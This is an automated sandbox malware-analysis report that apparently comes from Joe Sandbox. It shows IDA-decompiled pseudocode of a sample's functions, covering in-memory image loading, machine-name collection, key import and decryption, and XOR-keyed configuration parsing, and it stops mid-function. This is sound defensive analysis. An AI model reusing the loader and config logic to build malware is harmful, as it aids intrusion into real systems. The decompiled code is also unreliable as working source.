APIs

Part of subcall function 008C3D2E: lstrlen.KERNEL32(?,00000000,01309D08,00000000,008C695F,01309F2B,69B25F44,?,?,?,?,69B25F44,00000005,008CA00C,4D283A53,?), ref: 008C3D35
Part of subcall function 008C3D2E: mbstowcs.NTDLL ref: 008C3D5E
Part of subcall function 008C3D2E: memset.NTDLL ref: 008C3D70

GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74CB5520,00000008,00000014,004F0053,013093CC), ref: 008C39A1
HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74CB5520,00000008,00000014,004F0053,013093CC), ref: 008C39CF

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
String ID:
API String ID: 1500278894-0
Opcode ID: 4a43bbb84b6d9c0055f92afe48883b01f4260ffb78e79f33499abdb159f935f0
Instruction ID: 5782ac43d47ee3201cda9eb44bcdeb9831e2d52d64d00f8c644ffdf5b7804505
Opcode Fuzzy Hash: 4a43bbb84b6d9c0055f92afe48883b01f4260ffb78e79f33499abdb159f935f0
Instruction Fuzzy Hash: 5C01DF3220020ABBDF215FA8DC89F9B3F78FF85714F00402AFA40DA061EAB1C929C751

Uniqueness

Uniqueness Score: -1.00%

Function 008C3DE0 Relevance: 3.0, APIs: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E008C3DE0(void* __ecx) {
				signed int _v8;
				void* _t15;
				void* _t19;
				void* _t20;
				void* _t22;
				intOrPtr* _t23;

				_t23 = __imp__;
				_t20 = 0;
				_v8 = _v8 & 0;
				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					_t20 = E008C7A71(_t10 + 1);
					if(_t20 != 0) {
						_t15 =  *_t23(3, _t20,  &_v8); // executed
						if(_t15 != 0) {
							 *((char*)(_v8 + _t20)) = 0;
						} else {
							E008C789E(_t20);
							_t20 = 0;
						}
					}
				}
				return _t20;
			}

0x008c3de5
0x008c3df0
0x008c3df2
0x008c3df8
0x008c3dfa
0x008c3dff
0x008c3e08
0x008c3e0c
0x008c3e15
0x008c3e19
0x008c3e28
0x008c3e1b
0x008c3e1c
0x008c3e21
0x008c3e21
0x008c3e19
0x008c3e0c
0x008c3e31

APIs

GetComputerNameExA.KERNELBASE(00000003,00000000,008C3730,00000000,00000000,?,7491C740,008C3730), ref: 008C3DF8

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

GetComputerNameExA.KERNELBASE(00000003,00000000,008C3730,008C3731,?,7491C740,008C3730), ref: 008C3E15

Part of subcall function 008C789E: RtlFreeHeap.NTDLL(00000000,00000000,008C4E3E,00000000,?,00000000,00000000), ref: 008C78AA

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: ComputerHeapName$AllocateFree
String ID:
API String ID: 187446995-0
Opcode ID: 0f780a1ff9b5817fe18d106bf4e52201f2630b6f8cf1d938cabcc314a5e51db4
Instruction ID: 314b603d7049d78ed8b9f57ae0d4f4052a38965387feb696ac28a2e8292a936c
Opcode Fuzzy Hash: 0f780a1ff9b5817fe18d106bf4e52201f2630b6f8cf1d938cabcc314a5e51db4
Instruction Fuzzy Hash: 17F05E26600119BAEB11E6AADD05FAF77FCEBC5750F2140ADA900E7140EAB1DF029771

Uniqueness

Uniqueness Score: -1.00%

Function 008C72C0 Relevance: 3.0, APIs: 2, Instructions: 26
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C72C0(signed int __edx, intOrPtr _a4) {
				void* _t3;
				void* _t5;
				void* _t7;
				void* _t8;
				void* _t9;
				signed int _t10;

				_t10 = __edx;
				_t3 = HeapCreate(0, 0x400000, 0); // executed
				 *0x8ca2d8 = _t3;
				if(_t3 == 0) {
					_t8 = 8;
					return _t8;
				}
				 *0x8ca1c8 = GetTickCount();
				_t5 = E008C2D54(_a4);
				if(_t5 == 0) {
					_t5 = E008C2CEC(_t9, _a4); // executed
					if(_t5 == 0) {
						if(E008C534A(_t9) != 0) {
							 *0x8ca300 = 1; // executed
						}
						_t7 = E008C10AD(_t10); // executed
						return _t7;
					}
				}
				return _t5;
			}

0x008c72c0
0x008c72c9
0x008c72cf
0x008c72d6
0x008c72da
0x00000000
0x008c72da
0x008c72e7
0x008c72ec
0x008c72f3
0x008c72f9
0x008c7300
0x008c7309
0x008c730b
0x008c730b
0x008c7315
0x00000000
0x008c7315
0x008c7300
0x008c731a

APIs

HeapCreate.KERNELBASE(00000000,00400000,00000000,008C3930,?), ref: 008C72C9
GetTickCount.KERNEL32 ref: 008C72DD

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: CountCreateHeapTick
String ID:
API String ID: 2177101570-0
Opcode ID: 312c4fce89cfc551b73db149dad30523bfb301ff3a0a37cb25509d4d75bd19d3
Instruction ID: a72450970cc3668c83fdde89cabbadfc0c48df12d21086d76e86b2c464d221d2
Opcode Fuzzy Hash: 312c4fce89cfc551b73db149dad30523bfb301ff3a0a37cb25509d4d75bd19d3
Instruction Fuzzy Hash: F9F06D315087459ADB102F74AC0AF0936B4FB20749F50482DFD41D02A2EBB0C440AA27

Uniqueness

Uniqueness Score: -1.00%

Function 008C5BB5 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E008C5BB5(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x8ca348; // 0xa3d5a8
				_t4 = _t15 + 0x8cb3a0; // 0x1308948
				_t20 = _t4;
				_t6 = _t15 + 0x8cb124; // 0x650047
				_t17 = E008C4BD5(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E008C1D63(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x008c5bbf
0x008c5bc6
0x008c5bc7
0x008c5bc8
0x008c5bc9
0x008c5bcf
0x008c5bd4
0x008c5bd4
0x008c5bde
0x008c5bf0
0x008c5bf7
0x008c5c25
0x008c5bf9
0x008c5bfb
0x008c5c00
0x008c5c22
0x008c5c02
0x008c5c05
0x008c5c0c
0x008c5c11
0x008c5c13
0x008c5c13
0x008c5c18
0x008c5c18
0x008c5c00
0x008c5c2c

APIs

Part of subcall function 008C4BD5: SysFreeString.OLEAUT32(?), ref: 008C4CB4

Part of subcall function 008C1D63: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,008C6189,004F0053,00000000,?), ref: 008C1D6C
Part of subcall function 008C1D63: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,008C6189,004F0053,00000000,?), ref: 008C1D96
Part of subcall function 008C1D63: memset.NTDLL ref: 008C1DAA

SysFreeString.OLEAUT32(00000000), ref: 008C5C18

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: 3f340e31f416e4767d95a657068365caffde70c3d0e974d3b74eaa97b41e415e
Instruction ID: 728ce9856f4eb9ace2500d4516c511cc39bb45e62f6646becf1342846cf091a3
Opcode Fuzzy Hash: 3f340e31f416e4767d95a657068365caffde70c3d0e974d3b74eaa97b41e415e
Instruction Fuzzy Hash: CE015A32500619BFDF11AFA8CC45EAABBB8FB08754F044469FA01E7161E770E961CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00401329 Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00401329(void* __eax, intOrPtr _a4) {

				 *0x403190 =  *0x403190 & 0x00000000;
				_push(0);
				_push(0x40318c);
				_push(1);
				_push(_a4);
				 *0x403188 = 0xc; // executed
				L00401814(); // executed
				return __eax;
			}

0x00401329
0x00401330
0x00401332
0x00401337
0x00401339
0x0040133d
0x00401347
0x0040134c

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401223,00000001,0040318C,00000000), ref: 00401347

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: DescriptorSecurity$ConvertString
String ID:
API String ID: 3907675253-0
Opcode ID: 2ed8448a664af8dbfd4061e7b4b6ea82259f6e1c2e9b0ef4b3f051abbd3d4665
Instruction ID: 0a6ed26458322d25cf41c4398ef33c21c70633b53ff5094838ea71f747521604
Opcode Fuzzy Hash: 2ed8448a664af8dbfd4061e7b4b6ea82259f6e1c2e9b0ef4b3f051abbd3d4665
Instruction Fuzzy Hash: 6FC04C75150300B6E610AF009D46F457E597758B0AF60452EB644391E1C3F95254952D

Uniqueness

Uniqueness Score: -1.00%

Function 0040181A Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040181A(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x403160, 0, _a4); // executed
				return _t2;
			}

0x00401826
0x0040182c

APIs

RtlAllocateHeap.NTDLL(00000000,?,004014BA,00000030,?,00000000), ref: 00401826

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ffc2bee7e96f03ba20f6f25c32e4a96c4cf6c99a047c73a93cb7f1116150704d
Instruction ID: 3092cf90e7a1d4585fff80d284c7a06f71a0cf960e90f0812a630bad4f7f329e
Opcode Fuzzy Hash: ffc2bee7e96f03ba20f6f25c32e4a96c4cf6c99a047c73a93cb7f1116150704d
Instruction Fuzzy Hash: 82B01271104200ABCA114F50DF08F067E21B798701F004030B304340B082710820FB1D

Uniqueness

Uniqueness Score: -1.00%

Function 0040147E Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040147E(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x403160, 0, _a4); // executed
				return _t2;
			}

0x0040148a
0x00401490

APIs

RtlFreeHeap.NTDLL(00000000,00000030,004017B0,00000000,00000030,00000000,00000000,00000030,?,?,?,?,?,00401508), ref: 0040148A

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c2a9b64b8d0978bf82175768f91838575790ce16ddbfb376c354ea20483dfce9
Instruction ID: 19babb2e5ad36de5e86cb2f69479443a556bd5f033cd34182d883786aa01e702
Opcode Fuzzy Hash: c2a9b64b8d0978bf82175768f91838575790ce16ddbfb376c354ea20483dfce9
Instruction Fuzzy Hash: EBB01231004200ABDA114F50DF08F067F21B798701F008030B304740B082710920FB0C

Uniqueness

Uniqueness Score: -1.00%

Function 008C789E Relevance: 1.5, APIs: 1, Instructions: 5
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C789E(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x8ca2d8, 0, _a4); // executed
				return _t2;
			}

0x008c78aa
0x008c78b0

APIs

RtlFreeHeap.NTDLL(00000000,00000000,008C4E3E,00000000,?,00000000,00000000), ref: 008C78AA

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 5b11a6b61ecbea2098e7b526fe249b8926f10b4664783e6fb2d0898835f3405a
Instruction ID: 2e2e9efb52ba8c548445aadeddaa99eaf33c75323d813df6a7a60748eeb9fc2f
Opcode Fuzzy Hash: 5b11a6b61ecbea2098e7b526fe249b8926f10b4664783e6fb2d0898835f3405a
Instruction Fuzzy Hash: F2B01271500200EBCB114B00DE0CF057A31F750700F004010F3450007082720420FB16

Uniqueness

Uniqueness Score: -1.00%

Function 00401875 Relevance: 1.3, APIs: 1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401875(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				void* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x403180;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45);
				_t18 = E00401B39( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x403180 - 0x69b24f45 &  !( *0x403180 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E00401C1D(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E0040134F(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E00401E3D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E0040147E(_t42);
					L8:
					return _t29;
				}
			}

0x0040187d
0x0040187f
0x0040189b
0x004018ac
0x004018b3
0x00401911
0x00000000
0x004018b5
0x004018b5
0x004018bf
0x004018c3
0x004018c8
0x004018cb
0x004018d0
0x004018d4
0x004018d9
0x004018de
0x004018e2
0x004018e7
0x004018e8
0x004018ec
0x004018f1
0x004018f9
0x004018f9
0x004018f1
0x004018e2
0x004018d4
0x004018fb
0x00401904
0x00401908
0x00401912
0x00401918
0x00401918

APIs

Part of subcall function 00401B39: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,004018B1,?,?,?,?,?,00000002,?,?), ref: 00401B5D
Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401B7F
Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401B95
Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BAB
Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BC1
Part of subcall function 00401B39: GetProcAddress.KERNEL32(00000000,?), ref: 00401BD7

Part of subcall function 0040134F: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401387

Part of subcall function 00401E3D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,?), ref: 00401E76
Part of subcall function 00401E3D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 00401EEB
Part of subcall function 00401E3D: GetLastError.KERNEL32 ref: 00401EF1

GetLastError.KERNEL32(?,?), ref: 004018F3

Memory Dump Source

Source File: 00000000.00000002.509857032.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.509847912.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509861626.0000000000402000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509867001.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.509879007.0000000000406000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_sadf.jbxd

Similarity

API ID: AddressProc$ErrorLastProtectVirtual$HandleLibraryLoadModule
String ID:
API String ID: 3135819546-0
Opcode ID: 55e36e603ecf1f375935bfc2b6faf8baf07d13715f36cfb61c3d334d7de0f626
Instruction ID: 2a630c9bca26b312d1a6089272dc605b797118c6fb065e3c503f4e5450e97ac4
Opcode Fuzzy Hash: 55e36e603ecf1f375935bfc2b6faf8baf07d13715f36cfb61c3d334d7de0f626
Instruction Fuzzy Hash: 50113B77600701ABD721BBA9CC80CAF77BCAF88304700413EEA42B7661EAB4ED058794

Uniqueness

Uniqueness Score: -1.00%

Function 008C3A53 Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E008C3A53(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E008C78B3(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x8ca2d8, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E008C5BB5(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x008c3a53
0x008c3a5b
0x008c3a72
0x008c3a8d
0x008c3a91
0x008c3a96
0x008c3a98
0x008c3aaa
0x008c3ab6
0x008c3a9a
0x008c3a9a
0x008c3a9f
0x008c3aa4
0x008c3aa4
0x008c3a98
0x008c3abc
0x008c3ac0
0x008c3ac0
0x008c3a67
0x008c3a6c
0x008c3a70
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 008C5BB5: SysFreeString.OLEAUT32(00000000), ref: 008C5C18

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74D0F710,?,00000000,?,00000000,?,008C623B,?,004F0053,013093D8,00000000,?), ref: 008C3AB6

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 8a1ed07dcb19cefef6baa6533e7eb56d1f8d9c53e960d288fa7b43e4ef35ff39
Instruction ID: 60bc6a2e200a75bdc9e40a1b770e8023e33e1901c51b6376add4308975dac566
Opcode Fuzzy Hash: 8a1ed07dcb19cefef6baa6533e7eb56d1f8d9c53e960d288fa7b43e4ef35ff39
Instruction Fuzzy Hash: BD01D632500A29BBCB229F98CC05FAA7B79FF44790F44C028FA459A261D771DA61DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 008C44D8 Relevance: 1.3, APIs: 1, Instructions: 36
stringCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E008C44D8(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E008C47E5( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E008C7A71(_a8 + _a8);
					if(_t21 != 0) {
						E008C4456(_a4, _t21, _t23);
					}
					E008C789E(_a4);
				}
				return _t21;
			}

0x008c44e0
0x008c44e7
0x008c44e9
0x008c44f8
0x008c44ff
0x008c450e
0x008c4512
0x008c4519
0x008c4519
0x008c4521
0x008c4526
0x008c452b

APIs

lstrlen.KERNEL32(00000000,00000000,008C3831,00000000,?,008C22E5,00000000,008C3831,?,7491C740,008C3831,00000000,01309600), ref: 008C44E9

Part of subcall function 008C47E5: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,008C44FD,00000001,008C3831,00000000), ref: 008C481D
Part of subcall function 008C47E5: memcpy.NTDLL(008C44FD,008C3831,00000010,?,?,?,008C44FD,00000001,008C3831,00000000,?,008C22E5,00000000,008C3831,?,7491C740), ref: 008C4836
Part of subcall function 008C47E5: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 008C485F
Part of subcall function 008C47E5: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 008C4877
Part of subcall function 008C47E5: memcpy.NTDLL(00000000,7491C740,01309600,00000010), ref: 008C48C9

Part of subcall function 008C7A71: RtlAllocateHeap.NTDLL(00000000,00000000,008C4DB1), ref: 008C7A7D

Memory Dump Source

Source File: 00000000.00000002.511144705.00000000008C1000.00000020.10000000.00040000.00000000.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000000.00000002.511133416.00000000008C0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511194522.00000000008C9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511208474.00000000008CA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.511219310.00000000008CC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8c0000_sadf.jbxd

Similarity

API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
String ID:
API String ID: 894908221-0
Opcode ID: 29a31e57f35ee920dfe56db86bb00ae711446d98377af902449208bfa51c7a88
Instruction ID: b84fab7c28a3c53a59ee0478999cd617e5f594c383a0d33323bed039b4d7ce93
Opcode Fuzzy Hash: 29a31e57f35ee920dfe56db86bb00ae711446d98377af902449208bfa51c7a88
Instruction Fuzzy Hash: B4F0DA7610051CBBCF11AE59DD05EEA3BBEFF853A0F008026FE19CA111DA31DA959BA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 008C2792 Relevance: 12.3, APIs: 8, Instructions: 258
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E008C2792(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				void* _v16;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t56;
				intOrPtr _t57;
				intOrPtr _t58;
				signed int _t61;
				intOrPtr _t64;
				signed int _t65;
				signed int _t70;
				void* _t72;
				void* _t73;
				signed int _t75;
				signed int _t78;
				signed int _t82;
				signed int _t86;
				signed int _t90;
				signed int _t94;
				signed int _t98;
				void* _t101;
				void* _t102;
				void* _t115;
				void* _t118;
				intOrPtr _t121;

				_t118 = __esi;
				_t115 = __edi;
				_t104 = __ecx;
				_t101 = __ebx;
				_t28 =  *0x8ca344; // 0x69b25f44
				if(E008C1696( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x8ca374 = _v8;
				}
				_t33 =  *0x8ca344; // 0x69b25f44
				if(E008C1696( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L69:
					return _v12;
				}
				_t39 =  *0x8ca344; // 0x69b25f44
				_push(_t115);
				if(E008C1696( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L67:
					HeapFree( *0x8ca2d8, 0, _v16);
					goto L69;
				} else {
					_push(_t101);
					_t102 = _v12;
					if(_t102 == 0) {
						_t45 = 0;
					} else {
						_t98 =  *0x8ca344; // 0x69b25f44
						_t45 = E008C2A59(_t104, _t102, _t98 ^ 0x7895433b);
					}
					_push(_t118);
					if(_t45 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x8ca2e0 = _v8;
						}
					}
					if(_t102 == 0) {
						_t46 = 0;
					} else {
						_t94 =  *0x8ca344; // 0x69b25f44
						_t46 = E008C2A59(_t104, _t102, _t94 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x8ca2e4 = _v8;
						}
					}
					if(_t102 == 0) {
						_t47 = 0;
					} else {
						_t90 =  *0x8ca344; // 0x69b25f44
						_t47 = E008C2A59(_t104, _t102, _t90 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t104 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x8ca2e8 = _v8;
						}
					}
					if(_t102 == 0) {
						_t48 = 0;
					} else {
						_t86 =  *0x8ca344; // 0x69b25f44
